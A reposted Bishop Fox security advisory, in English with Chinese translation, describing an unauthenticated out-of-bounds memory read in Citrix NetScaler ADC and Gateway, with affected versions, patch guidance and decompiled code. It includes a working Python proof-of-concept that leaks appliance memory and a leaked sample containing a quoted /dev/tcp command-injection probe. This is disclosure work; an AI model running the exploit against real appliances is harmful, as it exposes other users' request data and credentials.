OOB Memory Read: Netscaler ADC and Gateway

IoT 4周前 admin
50 0 0

OOB Memory Read: Netscaler ADC and Gateway

Product Vendor 产品供应商

Cloud Software Group 云软件组

Product Description 产品描述

The affected Citrix NetScaler ADC and Gateway components are used for Authentication, Authorization, and Auditing (AAA), and remote access.
受影响的 Citrix NetScaler ADC 和网关组件用于身份验证、授权和审核 (AAA) 以及远程访问。

Vulnerabilities List 漏洞列表

One vulnerability was identified within Citrix Netscaler ADC and Gateway:
在 Citrix Netscaler ADC 和网关中发现一个漏洞:

  • Out-Of-Bounds Memory Read
    越界内存读取

Affected Version 受影响的版本

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35
    NetScaler ADC 和 NetScaler Gateway 14.1 之前的 14.1-12.35
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15
    NetScaler ADC 和 NetScaler Gateway 13.1 之前的 13.1-51.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21
    NetScaler ADC 和 NetScaler Gateway 13.0 之前的 13.0-92.21
  • NetScaler ADC 13.1-FIPS before 13.1-37.176
    低于 13.1-37.176 的 NetScaler ADC 13.1-FIPS
  • NetScaler ADC 12.1-FIPS before 12.1-55.302
    低于 12.1-55.302 的 NetScaler ADC 12.1-FIPS
  • NetScaler ADC 12.1-NDcPP before 12.1-55.302
    低于 12.1-55.302 的 NetScaler ADC 12.1-NDcPP

NetScaler ADC and NetScaler Gateway version 12.1 is now End Of Life (EOL) and is vulnerable.
NetScaler ADC 和 NetScaler Gateway 版本 12.1 现已停产 (EOL) 且易受攻击。

Summary of Findings 调查结果摘要

The vulnerability would enable an unauthenticated attacker to remotely obtain information from a NetScaler appliance configured as a Gateway or AAA virtual server. While similar in nature to CVE-2023-4966, this issue is much less likely to return highly sensitive information to an attacker.
未经身份验证的攻击者可利用此漏洞从配置为网关或 AAA 虚拟服务器的 NetScaler 设备远程获取信息。虽然此问题在性质上与 CVE-2023-4966 类似,但将高度敏感信息返回给攻击者的可能性要小得多。

Impact 冲击

The vulnerability allows an attacker to recover data from memory. Although in most cases nothing of value is returned, in our own testing of Bishop Fox Cosmos customers we have observed instances where POST request bodies from previous HTTP requests are leaked. Web applications use POST requests to transmit potentially sensitive information (e.g., state or credentials), so that request data should normally be kept private.
该漏洞允许攻击者从内存中恢复数据。尽管在大多数情况下不会返回任何有价值的东西,但在我们自己对 Bishop Fox Cosmos 客户的测试中,我们观察到以前 HTTP 请求的 POST 请求正文被泄露的情况。Web 应用程序使用 POST 请求来传输潜在的敏感信息(例如,状态或凭据),因此请求数据通常应保持私密。

Solution 溶液

Follow the remediation guidance specified in Citrix security bulletin CTX584986 by installing the following updated software as soon as possible:
按照 Citrix 安全公告CTX584986中指定的修复指南,尽快安装以下更新软件:

  • NetScaler ADC and NetScaler Gateway 14.1-12.35 and later releases
    NetScaler ADC 和 NetScaler Gateway 14.1-12.35 及更高版本
  • NetScaler ADC and NetScaler Gateway  13.1-51.15 and later releases of 13.1
    NetScaler ADC 和 NetScaler Gateway 13.1-51.15 及更高版本的 13.1
  • NetScaler ADC and NetScaler Gateway 13.0-92.21 and later releases of 13.0 
    NetScaler ADC 和 NetScaler Gateway 13.0-92.21 及更高版本的 13.0
  • NetScaler ADC 13.1-FIPS 13.1-37.176 and later releases of 13.1-FIPS 
    NetScaler ADC 13.1-FIPS 13.1-37.176 及更高版本的 13.1-FIPS
  • NetScaler ADC 12.1-FIPS 12.1-55.302 and later releases of 12.1-FIPS 
    NetScaler ADC 12.1-FIPS 12.1-55.302 及更高版本的 12.1-FIPS
  • NetScaler ADC 12.1-NDcPP 12.1-55.302 and later releases of 12.1-NDcPP
    NetScaler ADC 12.1-NDcPP 12.1-55.302 及更高版本的 12.1-NDcPP

Out-Of-Bounds Memory Read
越界内存读取

NetScaler ADC and Gateway products were vulnerable to an unauthenticated out-of-bounds memory read which could be exploited to capture information from the appliance’s process memory, including HTTP request bodies.
NetScaler ADC 和网关产品容易受到未经身份验证的越界内存读取的攻击,该读取可用于从设备的进程内存(包括 HTTP 请求正文)中捕获信息。

Vulnerability Details 漏洞详情

CVE ID: The vendor has updated CVE-2023-6549 to account for this vulnerability, along with the original denial of service vulnerability, as they are remediated by the same fix.
CVE ID:供应商已更新 CVE-2023-6549 以解决此漏洞以及原始拒绝服务漏洞,因为它们已通过相同的修复程序进行修复。

Vulnerability Type: Out-Of-Bounds Read
漏洞类型:越界读取

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)
访问向量:☒远程、☐本地、☐物理、☐上下文相关、☐其他(如果其他,请注明)

Impact: ☐ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)
影响:☐代码执行、☐拒绝服务、☐权限升级、☒信息泄露、☐其他(如果其他,请注明)

Security Risk: ☐ Critical, ☒ High, ☐ Medium, ☐ Low
安全风险:☐严重、☒高、☐中、☐低

Vulnerability: CWE-125 (Out-Of-Bounds Read)
漏洞:CWE-125(越界读取)

Bishop Fox staff determined that prior releases of NetScaler ADC and Gateway products were vulnerable to an unauthenticated out-of-bounds memory read and exploited the vulnerability to capture information from the appliance’s process memory, including HTTP request bodies.
Bishop Fox 工作人员确定,NetScaler ADC 和 Gateway 产品的早期版本容易受到未经身份验证的越界内存读取的攻击,并利用此漏洞从设备的进程内存中捕获信息,包括 HTTP 请求正文。

Bishop Fox staff determined that the Gateway or AAA virtual server performs unsafe handling of the HTTP Host request header when handling HTTP GET requests for the /nf/auth/startwebview.do URI. The vulnerable function attempts to calculate the length of a string containing the Host header and then direct a subsequent function to copy a string of that length to an HTTP response message. However, incorrect use of the C snprintf method results in the length exceeding the size of the source buffer and causing unrelated data to be copied to the response if the Host header value submitted in the request is longer than approximately 5,394 bytes. Authentication is not required to exploit this vulnerability.
Bishop Fox 工作人员确定,网关或 AAA 虚拟服务器在处理 URI 的 HTTP GET 请求 /nf/auth/startwebview.do 时对 HTTP Host 请求标头执行不安全的处理。易受攻击的函数尝试计算包含 Host 标头的字符串的长度,然后指示后续函数将该长度的字符串复制到 HTTP 响应消息中。但是,如果请求中提交的 Host 标头值超过大约 5,394 字节,则不正确使用 C snprintf 方法会导致长度超过源缓冲区的大小,并导致不相关的数据被复制到响应中。利用此漏洞不需要身份验证。

The following Python proof-of-concept code can be used to demonstrate exploitability when executed against a vulnerable appliance:
以下 Python 概念验证代码可用于演示针对易受攻击的设备执行时的可利用性:

import requests 
url = "https://<HOST>/nf/auth/startwebview.do"  
r = requests.get(url, headers={"Host":"A"*0x5000}, verify=False)  

print(r.content[0x1800:])

Figure 1 – Proof-of-concept exploit code
图 1 – 概念验证漏洞利用代码

Requests to the /nf/auth/startwebview.do URI are handled by the ns_aaa_start_webview_for_authv3 function. The ns_aaa_start_webview_for_authv3 function constructs an XML response using the snprintf function and returns this response to the user by calling the ns_vpn_send_response function, as shown below:
对 /nf/auth/startwebview.do URI 的请求由函数 ns_aaa_start_webview_for_authv3 处理。该 ns_aaa_start_webview_for_authv3 函数使用该 snprintf 函数构造一个 XML 响应,并通过调用该 ns_vpn_send_response 函数将此响应返回给用户,如下所示:

sprintf(print_temp_rule,"%s%.*s%s",proto,iVar5 - (int)host_hdr,host_hdr, 
  "/nf/auth/doWebview.do"); 
length = snprintf(&ns_HttpRedirectPkt,0x1800, 
  "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><AuthenticateRespo nse xmlns=\"http://citrix.com/authentication/response/1\"><Status>success</Statu s><Result>more-info</Result><StateContext></StateContext><AuthenticationRequirem ents><PostBack>/nf/auth/webview/done</PostBack><CancelPostBack>/nf/auth/doLogoff .do</CancelPostBack><CancelButtonText>Cancel</CancelButtonText><Requirements><Re quirement><Credential><ID>samlResponse</ID><Type>webview</Type><wv:WebView xmlns :wv=\"http://citrix.com/authentication/response/webview/1\"><wv:StartUrl>%.*s</w v:StartUrl></wv:WebView></Credential><Label><Type>none</Type></Label><Input/></R equirement></Requirements></AuthenticationRequirements></AuthenticateResponse>" 
  ,length,print_temp_rule); 
ns_vpn_send_response(lVar1,0x980200,&ns_HttpRedirectPkt,length);

Figure 2 – Excerpt of decompiled ns_aaa_start_webview_for_authv3 function
图2 — 反编译 ns_aaa_start_webview_for_authv3 函数摘录

The ns_vpn_send_response function sends an HTTP response where the body and size of the body are provided as parameters. In the code shown above, the size is set to the return value from the snprintf function. According to the documentation for the snprintf function, the return value is the number of characters that would have been written if enough space had been available. Therefore, if the constructed response would have exceeded the buffer size (0x1800 bytes in this case), the ns_vpn_send_response function will respond with extra data past the end of the buffer. This is identical to the underlying cause of CVE-2023-4966 (CitrixBleed).
该 ns_vpn_send_response 函数发送一个 HTTP 响应,其中正文和正文大小作为参数提供。在上面显示的代码中,size 设置为 snprintf 函数的返回值。根据该 snprintf 函数的文档,返回值是在有足够的可用空间的情况下写入的字符数。因此,如果构造的响应超过缓冲区大小(在本例中为 0x1800 字节),则该 ns_vpn_send_response 函数将在缓冲区末尾使用额外的数据进行响应。这与 CVE-2023-4966 (CitrixBleed) 的根本原因相同。

The unsafe use of the sprintf function in the ns_aaa_start_webview_for_authv3 function is discussed in more detail in the Insecure String Handling finding of this report.
本报告的不安全字符串处理结果中更详细地讨论了 ns_aaa_start_webview_for_authv3 函数中函数的不安全使用 sprintf 。

Bishop Fox staff analyzed prior releases of vulnerable Citrix deployments and observed instances where the disclosed memory contained data from HTTP requests, sometimes including POST request bodies. For example, the response below includes data from another HTTP request processed by the appliance, apparently related to a Nessus vulnerability scan:
Bishop Fox 员工分析了易受攻击的 Citrix 部署的早期版本,并观察到披露的内存包含来自 HTTP 请求的数据(有时包括 POST 请求正文)的实例。例如,以下响应包括来自设备处理的另一个 HTTP 请求的数据,显然与 Nessus 漏洞扫描有关:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> 
  <AuthenticateResponse xmlns="http://citrix.com/authentication/response/1"> 
    <Status>success</Status> 
    <Result>more-info</Result> 
    <StateContext></StateContext> 
    <AuthenticationRequirements> 
      <PostBack>/nf/auth/webview/done</PostBack> 
      <CancelPostBack>/nf/auth/doLogoff.do</CancelPostBack> 
      <CancelButtonText>Cancel</CancelButtonText> 
      <Requirements> 
        <Requirement> 
          <Credential> 
          <ID>samlResponse</ID> 
          <Type>webview</Type> 
          <wv:WebView xmlns:wv="http://citrix.com/authentication/response/webview/1"> 
          <wv:StartUrl>https://[...omitted for brevity...] 
            /Citrix/[REDACTED]/cgi-bin/ncbook/book.cgi ck.cgi 0-c%20%22echo%20exploited_port[80]by_nessus%20%26gt;/dev/tcp/[REDACTED]/41418") 20%23 xt=1 %22stdClass%22%3a3%3a%7bs%3a3%3a%22mod%22%3bs%3a15%3a%22resourcesmodule%22%3bs%3a3%3a%22src%22%3bs%3a20%3a%22%40random41940ceb78dbb%22%3bs%3a3%3a%22int%22%3bs%3a0%3a%22%22%3b%7d[...omitted for brevity...]

Figure 3 – NetScaler appliance response disclosing memory content
图 3 — NetScaler 设备响应泄露内存内容

Affected Locations 受影响的位置

URI

/nf/auth/startwebview.do

Function 功能

ns_aaa_start_webview_for_authv3 in /netscaler/nsppe

Credits 学分

  • Capability Development Group at Bishop Fox
    Bishop Fox 的能力发展小组

Timeline 时间线

  • 01/22/2024: Initial discovery
    01/22/2024: 初次发现
  • 01/25/2024: Contact with vendor
    01/25/2024: 联系供应商
  • 02/01/2024: Vendor acknowledged vulnerabilities
    2024/02/01:供应商承认的漏洞
  • 05/06/2024: Vulnerabilities publicly disclosed
    05/06/2024: 漏洞公开披露
  • 05/10/2024: Vendor updates security bulletin to confirm that that the fix for denial of service in CVE-2023-6549 also addresses the out-of-bounds memory read
    2024/05/10:供应商更新了安全公告,以确认 CVE-2023-6549 中的拒绝服务修复程序还解决了越界内存读取问题

原文始发于Bishop Fox, Security Experts:OOB Memory Read: Netscaler ADC and Gateway

版权声明:admin 发表于 2024年5月23日 上午10:43。
转载请注明:OOB Memory Read: Netscaler ADC and Gateway | CTF导航

相关文章